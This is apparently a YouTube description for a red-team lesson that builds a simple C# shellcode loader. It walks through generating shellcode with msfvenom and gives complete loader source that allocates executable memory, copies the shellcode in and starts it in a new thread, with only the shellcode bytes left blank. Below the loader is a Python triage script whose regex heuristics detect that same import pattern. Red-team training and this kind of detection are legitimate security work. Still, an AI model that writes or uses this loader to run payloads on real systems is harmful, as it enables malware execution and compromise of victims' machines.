C# payload mastery 01 - simple C# shellcode loader

faanross 2,500 1 year ago

link to code: https://github.com/faanross/payloads_mastery/blob/master/01_simple_backdoor.cs
note: code can also be found right at the bottom of this description.

defcon 27 c# backdoor: https://github.com/mvelazc0/defcon27_csharp_workshop
p/invoke signatures in c#: https://www.youtube.com/watch?v=baj9IpB_Z6Y

============================================================

in this first lesson we'll:
- use msfvenom to generate shellcode
- create a simple C# loader that will perform 3 critical functions:
  -- allocate memory
  -- inject shellcode into memory
  -- execute injected shellcode
- integrate shellcode into C# loader
- compile our code
- test our custom payload

============================================================

timestamps
00:00 - intro
00:43 - msfvenom process
01:15 - shellcode process
02:58 - generate shellcode
04:24 - create c# loader
18:15 - integrate shellcode into loader
19:25 - compile code
19:53 - test payload
20:20 - outro

============================================================

/*
ATTRIBUTION: the code was informed/inspired by:
https://github.com/mvelazc0/defcon27_csharp_workshop/blob/master/Labs/lab3/1.cs
Mauricio Velazco - @mvelazco
Olindo Verrillo - @olindoverrillo
*/

using System;
using System.Runtime.InteropServices;

namespace ShellcodePayload
{
    class Payload
    {
        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

        [DllImport("kernel32.dll")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        static void Main()
        {
            // (1) insert our shellcode
            byte[] shellCode = new byte[] { /* insert shellcode here */ };

            // (2) allocate memory for shellcode
            UInt32 MEM_COMMIT = 0x1000;
            UInt32 PAGE_EXECUTE_READWRITE = 0x40;
            IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UInt32)shellCode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

            // (3) inject shellcode into allocated memory
            Marshal.Copy(shellCode, 0, funcAddr, shellCode.Length);

            // (4) execute injected shellcode
            UInt32 threadId = 0;
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

============================================================

#redteamint #csharp #cybersecurity
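For reviewers triaging C# source, the three stages listed above (allocate, inject, execute) leave a recognizable static footprint: P/Invoke imports of VirtualAlloc and CreateThread, a 0x40 page protection, and a Marshal.Copy call. The Python sketch below is an added example, not code from the video or its repository; the function names, the regex heuristics and both sample strings are constructed for illustration.

```python
import re

# A P/Invoke declaration: [DllImport("lib", ...)] <modifiers> <type> Name(
PINVOKE = re.compile(r'\[DllImport\(\s*"([^"]+)"[^\]]*\][^;(]*?(\w+)\s*\(', re.S)
# Page protection 0x40 (PAGE_EXECUTE_READWRITE), by literal or by name
RWX = re.compile(r'\b0x0*40\b|PAGE_EXECUTE_READWRITE', re.I)
# C# comments, removed first so commented-out code does not count
COMMENT = re.compile(r'//[^\n]*|/\*.*?\*/', re.S)


def pinvoke_imports(source):
    """Return {function name: dll} for every DllImport declaration."""
    code = COMMENT.sub('', source)
    return {name: dll.lower() for dll, name in PINVOKE.findall(code)}


def triage(source):
    """Report which loader stages (allocate, copy, execute) appear in source."""
    code = COMMENT.sub('', source)
    imports = pinvoke_imports(code)
    stages = {
        "allocate": "VirtualAlloc" in imports,
        "rwx_protection": bool(RWX.search(code)),
        "copy": "Marshal.Copy" in code,
        "execute": "CreateThread" in imports,
    }
    # Heuristic (assumption): all four together warrant a manual look
    stages["suspicious"] = all(stages.values())
    return stages


# Constructed samples: the first mirrors the declarations in the description
LOADER_SAMPLE = '''
[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll")]
private static extern IntPtr CreateThread(IntPtr a, UInt32 b, IntPtr c, IntPtr d, UInt32 e, ref UInt32 f);
UInt32 PAGE_EXECUTE_READWRITE = 0x40;
Marshal.Copy(shellCode, 0, funcAddr, shellCode.Length);
'''
BENIGN_SAMPLE = '''
[DllImport("kernel32.dll", SetLastError = true)]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
'''

if __name__ == "__main__":
    for label, text in (("loader", LOADER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage(text))
```

A source-level match like this is only a triage signal: the same imports appear in legitimate interop code, so a hit is a reason to read the file rather than a verdict.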
